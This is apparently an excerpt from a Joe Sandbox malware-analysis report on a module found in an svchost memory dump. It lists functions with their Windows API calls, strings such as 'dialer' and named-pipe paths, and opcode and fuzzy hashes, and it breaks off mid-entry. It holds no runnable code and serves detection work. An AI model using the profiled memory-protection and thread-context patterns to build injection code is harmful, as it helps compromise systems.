FlsGetValue.KERNEL32(?,?,?,0000023C9FD9C7DE,?,?,?,?,?,?,?,?,0000023C9FD9CF9D,?,?,00000001), ref: 0000023C9FD9D087
FlsSetValue.KERNEL32(?,?,?,0000023C9FD9C7DE,?,?,?,?,?,?,?,?,0000023C9FD9CF9D,?,?,00000001), ref: 0000023C9FD9D0A6
FlsSetValue.KERNEL32(?,?,?,0000023C9FD9C7DE,?,?,?,?,?,?,?,?,0000023C9FD9CF9D,?,?,00000001), ref: 0000023C9FD9D0CE
FlsSetValue.KERNEL32(?,?,?,0000023C9FD9C7DE,?,?,?,?,?,?,?,?,0000023C9FD9CF9D,?,?,00000001), ref: 0000023C9FD9D0DF
FlsSetValue.KERNEL32(?,?,?,0000023C9FD9C7DE,?,?,?,?,?,?,?,?,0000023C9FD9CF9D,?,?,00000001), ref: 0000023C9FD9D0F0

Strings

1%, xrefs: 0000023C9FD9D0CE
Y%, xrefs: 0000023C9FD9D0A6

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: Value
String ID: 1%$Y%
API String ID: 3702945584-1395475152
Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction ID: e8c26fe5fe4feb14e3ba4e03a1f9060b6ef82e331d8c99b7b9407e267a680212
Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction Fuzzy Hash: 7011862370674441FA686FB6955E37962459B447F2F3A4324E879377DADF2CC6829300

Function 0000023C9FD97510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000023C9FD97538
__scrt_acquire_startup_lock.LIBCMT ref: 0000023C9FD9758A
_RTC_Initialize.LIBCMT ref: 0000023C9FD975B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000023C9FD975DE
__scrt_release_startup_lock.LIBCMT ref: 0000023C9FD97609

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: c81ae31f02d2e224a68d0c04c6ddf062c43f5ec167f886d717914fbe70619f4a
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: 9081E32370270186FB90AFE5944D3B96690AB85B87F3B4525D92877796DB3CCBC58700

Function 0000023C9FD99DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 0000023C9FD99E49
GetLastError.KERNEL32 ref: 0000023C9FD99E57
LoadLibraryExW.KERNEL32 ref: 0000023C9FD99E81
FreeLibrary.KERNEL32 ref: 0000023C9FD99EC7
GetProcAddress.KERNEL32 ref: 0000023C9FD99ED3

Strings

api-ms-, xrefs: 0000023C9FD99E69

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction ID: bcdf0de65a7d2d3d11683321deb0e480384ed9bad8611b56bf596f421dc6149d
Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction Fuzzy Hash: B631C323313B40E1EE22DF92A4887752394B748BA2F6B0525DD2D2B394EF3EC6D58305

Function 0000023C9FDA3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000023C9FDA3DE5
GetLastError.KERNEL32 ref: 0000023C9FDA3DF1
CloseHandle.KERNEL32 ref: 0000023C9FDA3E09
CreateFileW.KERNEL32 ref: 0000023C9FDA3E34
WriteConsoleW.KERNEL32 ref: 0000023C9FDA3E53

Strings

CONOUT$, xrefs: 0000023C9FDA3E15

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction ID: fc3ee547b90a58897c853057f39df720ccbe3a45c8b939da15aca02b7eb807e6
Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction Fuzzy Hash: 9C118F33310B8086E7508F52E84832976A0F788FEAF254225EA6A97794CF7DCA548748

Function 0000023C9FD93790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000023C9FD9379E
GetCurrentProcess.KERNEL32 ref: 0000023C9FD937CC
VirtualProtectEx.KERNEL32 ref: 0000023C9FD937EE
GetCurrentProcess.KERNEL32 ref: 0000023C9FD93809
VirtualProtectEx.KERNEL32 ref: 0000023C9FD9382A

Strings

wr, xrefs: 0000023C9FD937FF

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID: wr
API String ID: 1092925422-2678910430
Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction ID: f581b2753d3311771d2ef88649b5c3dbc002ea74c6a5500dacb6231ddfec3b34
Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction Fuzzy Hash: E9115B2B705B41C2EF149F61E40837A76A4FB88F8AF660429DE9917794EF3DC685C708

Function 0000023C9FD95B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000023C9FD95B6B
GetThreadContext.KERNEL32 ref: 0000023C9FD95CD5

Part of subcall function 0000023C9FD95960: GetCurrentThreadId.KERNEL32 ref: 0000023C9FD95964

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction ID: c7858c9595cf304ad0778e2fc3f229bfab6e13f368fba6bf50820e945dd4b50a
Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction Fuzzy Hash: C2D19A37205B8882DB709F46E49836A77A0F3C8B85F214216EACD57BA5DF3DC691CB00

Function 0000023C9FD92F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000023C9FD92F27
HeapAlloc.KERNEL32 ref: 0000023C9FD92F3A
StrCmpNIW.SHLWAPI ref: 0000023C9FD92FAF
GetProcessHeap.KERNEL32 ref: 0000023C9FD93015
HeapFree.KERNEL32 ref: 0000023C9FD93023

Strings

dialer, xrefs: 0000023C9FD92FA8

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction ID: 9359298e96b3c04a7ea4b820f75502f3f97a85a75e9c2082bfe538fa6ca21202
Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction Fuzzy Hash: A131B023702B5582EA15DF97E94877A67A0FB45B86F1A4120DF4867B55EF3CC6E1C300

Function 0000023C9FD914A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000023C9FD914C5
HeapFree.KERNEL32 ref: 0000023C9FD914D4
GetProcessHeap.KERNEL32 ref: 0000023C9FD914E1
HeapFree.KERNEL32 ref: 0000023C9FD914F0
GetProcessHeap.KERNEL32 ref: 0000023C9FD91500

Strings

C:\Windows\System32\svchost.exe, xrefs: 0000023C9FDA61A9, 0000023C9FDA61B1

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID: C:\Windows\System32\svchost.exe
API String ID: 3168794593-3822071397
Opcode ID: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
Instruction ID: ef2c8a893de3dfc8a32d16b7cd1fc9c1132167686339b654e377d72c87c66156
Opcode Fuzzy Hash: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
Instruction Fuzzy Hash: 6B21A06B909BD0CAE352DF259C593AD2BE0F759F4AF2A4016DB45A3247DE2DC6048704

Function 0000023C9FD9CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000023C9FD9CFAF
FlsSetValue.KERNEL32(?,?,?,0000023C9FD9D6B5,?,?,?,?,0000023C9FD9D778), ref: 0000023C9FD9CFE5
FlsSetValue.KERNEL32(?,?,?,0000023C9FD9D6B5,?,?,?,?,0000023C9FD9D778), ref: 0000023C9FD9D012
FlsSetValue.KERNEL32(?,?,?,0000023C9FD9D6B5,?,?,?,?,0000023C9FD9D778), ref: 0000023C9FD9D023
FlsSetValue.KERNEL32(?,?,?,0000023C9FD9D6B5,?,?,?,?,0000023C9FD9D778), ref: 0000023C9FD9D034
SetLastError.KERNEL32 ref: 0000023C9FD9D04F

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction ID: 56e012b5d1dc7e002c7adf90bc31e60c974fd27b6bfcadef6d938c98811c32d9
Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction Fuzzy Hash: C511812330374081FA64AFB2954D33D6242AB857F6F360724E876677DADE2CC6819300

Function 0000023C9FD9199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000023C9FD919C2
K32GetModuleFileNameExW.KERNEL32 ref: 0000023C9FD919E0
PathFindFileNameW.SHLWAPI ref: 0000023C9FD919EF
lstrlenW.KERNEL32 ref: 0000023C9FD919FB
StrCpyW.SHLWAPI ref: 0000023C9FD91A0E
CloseHandle.KERNEL32 ref: 0000023C9FD91A1C

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction ID: 13d99b4807abd619a55dff71f34bee12b8a4746c9564a352daa39f4ca56a7e68
Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction Fuzzy Hash: 5F016922300B4082EB10DF52A84C36A63A1F788FCAFAA4035DE5963754DF3CCA8AC704

Function 0000023C9FD99005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000023C9FD99013
_IsNonwritableInCurrentImage.LIBCMT ref: 0000023C9FD990A8
RtlUnwindEx.NTDLL ref: 0000023C9FD990F7

Strings

f, xrefs: 0000023C9FD99026
csm, xrefs: 0000023C9FD9908E

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: 1f90d7c7ad59199f97c1a7438c6a9a4619e7d053edb22fbc608bcc98bd4b9d08
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: 4451BE337027008AEB54DF65E44CB7937A6F344B8AF628124DA1673788EB79DAC1C705

Function 0000023C9FD98FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000023C9FD99013
_IsNonwritableInCurrentImage.LIBCMT ref: 0000023C9FD990A8
RtlUnwindEx.NTDLL ref: 0000023C9FD990F7

Strings

f, xrefs: 0000023C9FD99026
csm, xrefs: 0000023C9FD9908E

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: 07a3565f698964cbb3a4654292ca8ae5c348360f6e4fe9823536838693a240fb
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: 9731D133202740C6EB54DF62E84C7293BA5F344B8AF268014EE5A23789DB3DCA80C706

Function 0000023C9FD91A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000023C9FD91A60
StrCmpNIW.SHLWAPI ref: 0000023C9FD91A7A
lstrlenW.KERNEL32 ref: 0000023C9FD91A89
StrCpyW.SHLWAPI ref: 0000023C9FD91A9E

Strings

\\?\, xrefs: 0000023C9FD91A6E

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction ID: 23ca7c8f60db608dac3268c4892bef963bbdddfd80e7d2892e867c6f1acef7e4
Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction Fuzzy Hash: A2F06223304B41D2EB609F61F8C87696761F758F8AFA58021DA4956958DF7CCB8ECB04

Function 0000023C9FD9BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000023C9FD9BCBD
GetProcAddress.KERNEL32 ref: 0000023C9FD9BCD3
FreeLibrary.KERNEL32 ref: 0000023C9FD9BCFA

Strings

CorExitProcess, xrefs: 0000023C9FD9BCCC
mscoree.dll, xrefs: 0000023C9FD9BCB4

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction ID: f120134d89cc3ff4ac82abde9f44cd907dde6f2fa0f09169b0ae68eb03632b04
Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction Fuzzy Hash: 65F09663311B04C1EF148F64E44C3796320EB85F66F661219DA7A561E4CF3CC785C304

Function 0000023C9FD93044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000023C9FD93066
StrCpyW.SHLWAPI ref: 0000023C9FD93076
StrCatW.SHLWAPI ref: 0000023C9FD93082
PathCombineW.SHLWAPI ref: 0000023C9FD93090

Strings

\\.\pipe\, xrefs: 0000023C9FD9305C

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction ID: 63bf0631c2ce08038e8afd47d845ce43b19718df71123393761432e8610f9e68
Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction Fuzzy Hash: 4FF08222304B80C2EA009F53B90C2396264AB48FC6F298030EE5A27B18DF3CC6868704

Function 0000023C9FD950D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000023C9FD95156

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction ID: 27460493759cfd513e95e9acbc061ad8e741853e6674a0c4eb1be6d369746711
Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction Fuzzy Hash: 5F02ED33219B8486E7A0CF95F49436AB7A0F3C4785F210125EA8E97BA9DF7CC594CB00

Function 0000023C9FD95710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000023C9FD95726

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction ID: 13d60bb38955cae3189d8a2bb61af228ad7e90773a2fa293d18278bd4efa4042
Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction Fuzzy Hash: 6761CC3751AB44C6E760CF55E44832AB7E0F388786F210126EA8E57BA8DB7CC695CF00

Function 0000023C9FDA4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000023C9FDA412C
_set_statfp.LIBCMT ref: 0000023C9FDA4147
_set_statfp.LIBCMT ref: 0000023C9FDA4163
_set_statfp.LIBCMT ref: 0000023C9FDA419F

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: a6d18e22d9c748128799939e0654a87f56c25303a8cede26c8329d518403cd37
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 2C11E323A10F4051F6A61F68E45D37511806B7BBBAF3B4A34E976276F6CB2CCB405308

Function 0000023C9FD99650 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000023C9FD9966F
SetLastError.KERNEL32 ref: 0000023C9FD996F6

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
Instruction ID: 7cd8ba41c2925395cb7c9359367532a4a56c2306d61c1e992674a85071185b21
Opcode Fuzzy Hash: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
Instruction Fuzzy Hash: A211632330239082FE549FA6984C37962956B48BE3F364724D936377D9DA2CCA81C701

Function 0000023C9FD9AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000023C9FD9AA68
_CallSETranslator.LIBVCRUNTIME ref: 0000023C9FD9AAB7

Strings

MOC, xrefs: 0000023C9FD9AA7C
RCC, xrefs: 0000023C9FD9AA85

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 0bebfacf85e04dc8df566765b1bb9a45dc94805908403f3c6b4d7d15f2017294
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: C461583B602B848AEB20DFA5D4843AD77B0F348B99F254215EF4927B98DB38D695C700

Function 0000023C9FD9AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000023C9FD9ADA0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000023C9FD9AE88

Strings

csm, xrefs: 0000023C9FD9ADC2
csm, xrefs: 0000023C9FD9AEDA

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: b5b3cd2e7d2b3ba65c0c38fc053bdc294db5e1aadc0f0551ef11afe4c2e778d2
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 9451B07B2013808AFB748F95948837977A0F355BA6F265216EB9967BD5CB3CC6D0C700

Function 0000023C9FDA2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000023C9FDA20D7
WriteFile.KERNEL32 ref: 0000023C9FDA239F
WriteFile.KERNEL32 ref: 0000023C9FDA23E5
GetLastError.KERNEL32 ref: 0000023C9FDA249B

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction ID: d2a503851be96b6516d99fb73f83dfb610c96ca901761488bc4f8c611d374a52
Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction Fuzzy Hash: A7D10333714B8089E711CFBAD5483AC3BB1F355B9AF214216CE5DA7B99DA38C646C344

Function 0000023C9FDA2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 0000023C9FDA2A9C
GetLastError.KERNEL32 ref: 0000023C9FDA2B27

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction ID: dfac7770a03030c8138235460075494dc8b96b5442b412831c4990e57e6e5698
Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction Fuzzy Hash: 8C91BF7370075086F7619F6695883BD3BA0B706F8BF264109DE0A77A88DB3CC682C708

Function 0000023C9FD97960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000023C9FD9798C
GetCurrentThreadId.KERNEL32 ref: 0000023C9FD9799A
GetCurrentProcessId.KERNEL32 ref: 0000023C9FD979A6
QueryPerformanceCounter.KERNEL32 ref: 0000023C9FD979B6

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction ID: 4ed76368ea000a64330ec930436fe3a4810d52bf42b8390d9f0f35c83193dfce
Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction Fuzzy Hash: A9113023711F0189EB00CF70E8593B833A4F759B59F550E21EA6D567A8DF7CC2A88380

Function 0000023C9FD9253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000023C9FD92620
StrCpyW.SHLWAPI ref: 0000023C9FD92639

Strings

\\.\pipe\, xrefs: 0000023C9FD9262B

Memory Dump Source

